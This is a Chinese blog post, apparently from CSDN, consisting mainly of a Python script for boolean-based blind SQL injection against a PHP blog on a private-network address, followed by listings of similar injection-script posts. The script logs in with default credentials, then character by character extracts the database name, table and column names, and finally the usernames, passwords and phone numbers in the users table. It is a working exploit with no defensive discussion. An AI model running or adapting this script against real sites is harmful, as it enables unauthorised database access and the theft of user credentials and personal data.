Python SQL布尔型盲注

已于 2022-07-19 09:17:13 修改
阅读量227 收藏
点赞数
文章标签: python sql 数据库
于 2022-07-03 17:28:43 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45972507/article/details/125586875
版权 
# -*- coding: utf-8 -*-
# @Time : 2022/6/16 17:12
# @Author : admin
# @Email : 1985264689@qq.com
# @File : blindtk.py
# @Project : 项目
# @脚本说明 :
from collections import Counter
import requests

#保持session会话状态
url = 'http://192.168.0.0/learn/blog/login-1.php'
data = {'username':'admin','password':'123456','vcode':'0000'}
session = requests.session()
resp = session.post(url=url,data=data)

#取数据库名称长度
count = []
for l in range(1,10):
    url1 = f'http://192.168.0.0/learn/blog/edit.php?id=1 and length(database())={l}'
    data_len = session.get(url=url1)
    lens = len(data_len.text)
    #用Counter去计算列表内出现最多的值
    count.append(lens)
    num = Counter(count)
    res = num.most_common()
    max = res[0][0]
    if lens > max:
        print(l)

#取数据库名称
sum = 'abcdefghijklmnopqrstuvwxyz0123456789,_:'
dataname = ''
count = []
for k in range(1,16):
    for i in sum:
        url2 = f'http://192.168.0.0/learn/blog/edit.php?id=1 and substr(database(),{k},1)="{i}"'
        data_name = session.get(url=url2)
        lens = len(data_name.text)
        count.append(lens)
        num = Counter(count)
        res = num.most_common()
        max = res[0][0]
        if lens > max:
            dataname += i
            break
print(dataname)

#取数据库表名
table_list = ''
count = []
for h in range(0, 15):
    for i in sum:
        url3 = f'http://192.168.0.0/learn/blog/edit.php?id=1 and ' \
               f'substr((select group_concat(table_name) from information_schema.tables where table_schema="{dataname}"),{h},1)="{i}"'
        table_name = session.get(url=url3)
        lens = len(table_name.text)
        count.append(lens)
        num = Counter(count)
        res = num.most_common()
        max = res[0][0]
        if lens > max:
            table_list += i
            break
print(table_list)

#取表中的列名
tablenames = table_list.strip().split(',')
count = []
for tablename in tablenames:
    column_list = ''
    for h in range(100):
        for i in sum:
            url4 = f'http://192.168.0.0/learn/blog/edit.php?id=1 and ' \
                   f'substr((select group_concat(column_name) from information_schema.columns where table_schema="{dataname}" and table_name="{tablename}" ),{h},1)="{i}"'
            column_name = session.get(url=url4)
            lens = len(column_name.text)
            count.append(lens)
            num = Counter(count)
            res = num.most_common()
            max = res[0][0]
            if lens > max:
                column_list += i
                break
    print(column_list)

# 取users表中的核心列名值
center_value = ''
count = []
for m in range(200):
    for i in sum:
        url5 = f'http://192.168.0.0/learn/blog/edit.php?id=1 and substr((select group_concat(concat_ws(":",username,password,phone)) from users),"{m}",1)="{i}"'
        value = session.get(url=url5)
        lens = len(value.text)
        count.append(lens)
        num = Counter(count)
        res = num.most_common()
        max = res[0][0]
        if lens > max:
            center_value += i
            break
print(center_value)
jerciver
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
使用python进行sql布尔盲注exp的编写
CC210231的博客
04-04 2528
前言: 前面学习并实现了简单的注入exp编写,那是根据注入的payload 匹配 网页内容得到注入数据,像这种exp只能应用于简单的注入,盲注入就要复杂一些,但是原理也是差不多。 exp原理: 我们知道,对于sql布尔盲注,也就是页面只会返回两种状态,一种是注入语句正确执行返回正常页面,一种就是注入语句执行错误返回不正常页面,我们就可以通过返回页面的状态判断我们注入语句是否正确执行,在sql布尔盲注中,我们常通过逐个判断字符来得到最终的信息,源于此,我们就有如下思路了: 返回的页面不同,也就是返回.
Python】测试布尔盲注脚本
weixin_30457881的博客
11-16 333
sqli-labs第八关:单引号布尔盲注,手工测出database长度,个人觉得手工比较快 然后使用脚本测database内容,这个脚本就比手工快多了,脚本内容如下: 1 import sys 2 import requests 3 4 url="http://127.0.0.1/sqli-labs-master/Less-8/?id=1%s" 5 payload="...
python脚本实现布尔盲注
最新发布
求大佬师傅带
04-28 773
相信师傅们在平常渗透测试中,偶尔会遇到布尔盲注的情况,但是手工的话太慢,上sqlmap流量又太大,特征太明显。所以用python脚本就是最优解,可以自定义user-agent等字段,注入速度等。
布尔盲注.py_sql盲注python_
10-03
一个简单的sql注入盲注python脚本,其中语句需要根据环境条件做改变
基于python布尔盲注爆破脚本(sqli-libs第八关)
henghengzhao_的博客
10-06 1782
写这个脚本的原因是因为布尔爆破步骤的繁琐,因此写下这个半自动化脚本来提升效率,只需输入url和标志词便可开始爆破
python脚本之布尔盲注
ro4lsc的博客
04-21 7117
这个好像也没什么可以多说了,那么直接上脚本吧 import optparse import requests #---------------------------- usage = "python3 %prog -u <URL> -P <patten> -F <find text>" parser = optparse.OptionParser(usage...
SQL注入之基于布尔盲注详解
09-10
首先说明的盲注是注入的一种,指的是在不知道数据库返回值的情况下对数据中的内容进行猜测,实施SQL注入。盲注一般分为布尔盲注和基于时间的盲注。这篇文章主要讲解的是基于布尔盲注。下面来一起看看吧。
布尔盲注python3范本模板
01-16
布尔盲注python3范本模板
SQL住入原始脚本_SQL注入python脚本_
10-03
用于SQL注入,打开SQLmap运行脚本。布尔盲注 延时注入
SqlMap-Sql注入
08-02
完全支持布尔盲注、时间盲注、基于错误信息的注入、联合查询注入和堆查询注入。 在数据库证书、IP地址、端口和数据库名等条件允许的情况下支持不通过SQL注入点而直接连接数据库。 支持枚举用户、密码、哈希、...
python实现sql布尔盲注
箭雨镜屋
04-25 1350
一、python代码 二、使用方法 三、测试
词达人小工具2
m0_61369360的博客
04-27 217
【代码】词达人小工具2。
Python之路 | 布尔盲注、延时EXP编写
IerkeU的博客
03-29 860
什么是POC、EXP、payload? 答: ​ POC: ​ 全称为‘Proof of concept’,意为概念验证,常指为一段漏洞的证明代码 ​ 理解为:发现可能存在的漏洞后,强调对漏洞是否存在进行验证 ​ EXP: ​ 全称为‘Exploit’,意为利用,指利用系统漏洞进行攻击的动作 ​ 理解为:对已存在的漏洞进行利用,强调利用已有的资源 ​ Payload: ​ 意为有效载荷,指成功exploit之后,真正在目标系统执行的代码或指令 ​ 理解为例如使用了一条恶意SQL语句,使网站出现报
python布尔盲注的脚本
kiihuang的博客
03-28 486
使用python,编写一个可以自动爆破的布尔盲注脚本,根据不同情况调整里面的Content-Length的值。
Python自动化sql注入:布尔盲注
qq_46145027的博客
04-22 3183
sql注入时,使用python脚本可以大大提高注入效率,这里演示一下编写python脚本实现布尔盲注的基本流程:演示靶场:sqli-labs。
Python自动化sql注入:布尔盲注_布尔盲注脚本
2401_83739411的博客
04-07 699
学好 Python 不论是就业还是做副业赚钱都不错,但要学会 Python 还是要有一个学习规划。最后大家分享一份全套的 Python 学习资料,给那些想学习 Python 的小伙伴们一点帮助!
SQL注入漏洞测试(布尔盲注)python
weixin_45445398的博客
03-08 429
打开题目后,显然使用order by 判断列数 select 1,2,3,4 发现错误没有回显(有回显的参照我之前发的)这时候就开始爆破数据库了(我使用手动+py脚本,sqlmap更方便这里练习就使用py)得到列名 name password status,后就是爆破里面的数据。输出得到mozhe mozhe,同样的将name换成password后得到。当判断数据库长度为1时页面错误看源码不断实验发现数据库名长度为10。得到数据库名stormgroup,之后开始爆破表个数,表长和表名。
布尔盲注Python脚本
末初的CSDN博客
03-12 6839
布尔盲注Python脚本,功能完整,可以参考一下大致结构,如果觉得有什么写的不足的地方,请尽管留言指正,一起交流进步

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值